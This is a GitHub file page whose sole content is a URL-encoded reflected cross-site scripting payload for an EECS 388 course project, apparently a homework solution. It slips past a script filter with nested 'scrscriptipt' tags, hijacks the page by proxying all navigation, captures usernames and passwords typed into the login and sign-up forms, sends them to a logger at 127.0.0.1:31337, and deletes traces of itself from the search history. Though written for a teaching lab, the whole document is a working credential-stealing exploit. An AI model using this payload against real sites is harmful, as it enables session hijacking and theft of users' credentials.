-
Notifications
You must be signed in to change notification settings - Fork 2
/
xss_2.txt
1 lines (1 loc) · 3.82 KB
/
xss_2.txt
1
http://eecs388.org/project2/search?xssdefense=2&q=%3Cscrscriptipt%3Efunction%20payload(attacker)%7B%0Afunction%20log(data)%7B%0Aconsole.log(%24.param(data))%3B%0A%24.get(attacker%2B%22stolen%22%2Cdata)%3B%0A%7D%0Afunction%20proxy(href%2CqVal%2ChVal)%7B%0A%24(%22html%22).load(href%2Cfunction()%7B%0Avar%20logO%3D%7Bevent%3A%20%22nav%22%7D%3B%0Avar%20logUser%3D%20%24(%22%23logged-in-user%22).text()%3B%0Aif(logUser)logO%5B%22user%22%5D%3DlogUser%3B%0AlogO%5B%22url%22%5D%3Dhref%3B%0Alog(logO)%3B%0A%24(%22html%22).append(%22%3Cscrscriptipt%22%2B%22%3E%22%2Bpayload.toString()%2B%22%3B%3C%2Fscrscriptipt%22%2B%22%3E%22)%3B%0A%24(%22.history-item%22).each(function(elm)%7B%0Aif(%24(this).text().indexOf(%22function%20payload(%22)%3E%3D%200)%7B%0A%24(this).remove()%3B%0A%7D%0A%7D)%0A%24(%22%23query%22).val(qVal)%3B%0A%24(%22%23history-list%22).html(hVal)%3B%0A%24(%22%23bungle-lnk%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20g%3D%22%2Fproject2%2F%22%3B%0Aif(location.pathname!%3Dg)%7B%0Ahistory.pushState(%7B%7D%2C%22%22%2Cg)%3B%0Aproxy(g)%3B%0A%7D%0A%7D)%3B%0A%24(%22%23search-again-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20g%3D%22.%2F%22%3B%0Ahistory.pushState(%7B%7D%2C%22%22%2C%20g)%3B%0Aproxy(g)%3B%0A%7D)%3B%0A%24(%22%23log-in-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20user%3D%24(%22input%23username%22).val()%3B%0Avar%20pass%3D%24(%22%23userpass%22).val()%3B%0A%24.ajax(%7B%0Atype%3A%22POST%22%2C%0Aurl%3A%22.%2Flogin%22%2C%0Adata%3A%7Busername%3Auser%2Cpassword%3Apass%7D%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3A%22login%22%2Cuser%3Auser%2Cpass%3Apass%7D)%3B%0Aproxy(%22.%2F%22)%3B%0A%7D)%3B%0A%7D)%3B%0A%24(%22%23log-out-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0A%24.ajax(%7B%0Atype%3A%22POST%22%2C%0Aurl%3A%22.%2Flogout%22%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3A%22logout%22%2Cuser%3AlogUser%7D)%3B%0Avar%20g%3D%22%2Fproject2%2F%22%3B%0Aif(location.pathname!%3D%20g)%7B%0Ahistory.pushState(%7B%7D%2C%22%22%2C%20g)%3B%0A%7D%0Aproxy(g)%3B%0A%7D)%3B%0A%7D)%3B%0A%24(%22%23new-account-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20user%3D%24(%22input%23username%22).val()%3B%0Avar%20pass%3D%24(%22%23userpass%22).val()%3B%0A%24.ajax(%7B%0Atype%3A%22POST%22%2C%0Aurl%3A%22.%2Fcreate%22%2C%0Adata%3A%7Busername%3Auser%2Cpassword%3Apass%7D%0A%7D)%0A.done(function()%7B%0Alog(%7Bevent%3A%22login%22%2Cuser%3Auser%2Cpass%3Apass%7D)%3B%0Aproxy(%22.%2F%22)%3B%0A%7D)%3B%0A%7D)%3B%0A%24(%22%23search-btn%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20obj%3Dhistory.state%3B%0Aobj%5B%22query%22%5D%3D%24(%22%23query%22).val()%3B%0Ahistory.replaceState(obj%2C%22%22%2Clocation.pathname)%3B%0Avar%20g%3D%22.%2Fsearch%3Fq%3D%22%2BencodeURIComponent(%24(%22%23query%22).val()).replace(%2F%2520%2Fg%2C%22%2B%22)%3B%0Ahistory.pushState(obj%2C%22%22%2Cg)%3B%0Aproxy(g)%3B%0A%7D)%3B%0A%24(%22.history-item.list-group-item%22).on(%22click%22%2Cfunction(event)%7B%0Aevent.preventDefault()%3B%0Avar%20obj%3Dhistory.state%3B%0Aobj%5B%22hVal%22%5D%3D%24(%22%23history-list%22).html()%3B%0Ahistory.replaceState(obj%2C%22%22%2Clocation.pathname%2Blocation.search)%3B%0Avar%20g%3D%22.%2Fsearch%3Fq%3D%22%2BencodeURIComponent(%24(this).text()).replace(%2F%2520%2Fg%2C%22%2B%22)%3B%0Ahistory.pushState(%7B%7D%2C%22%22%2Cg)%3B%0Aproxy(g)%3B%0A%7D)%3B%0A%24(%22html%22).show()%3B%0A%7D)%3B%0A%7D%0A%24(%22html%22).hide()%3B%0Aproxy(%22.%2F%22)%3B%0Ahistory.replaceState(%7B%7D%2C%22%22%2C%22%2Fproject2%2F%22)%3B%0A%24(window).on(%22popstate%22%2C%20function(event)%7B%0Aif(event.originalEvent.state!%3Dnull)%7B%0Aproxy(location.href%2Cevent.originalEvent.state%5B%22query%22%5D%2Cevent.originalEvent.state%5B%22hVal%22%5D)%3B%0A%7D%0A%7D)%3B%0A%7D%3Bpayload(%22http%3A%2F%2F127.0.0.1%3A31337%2F%22)%3B%3C%2Fscrscriptipt%3E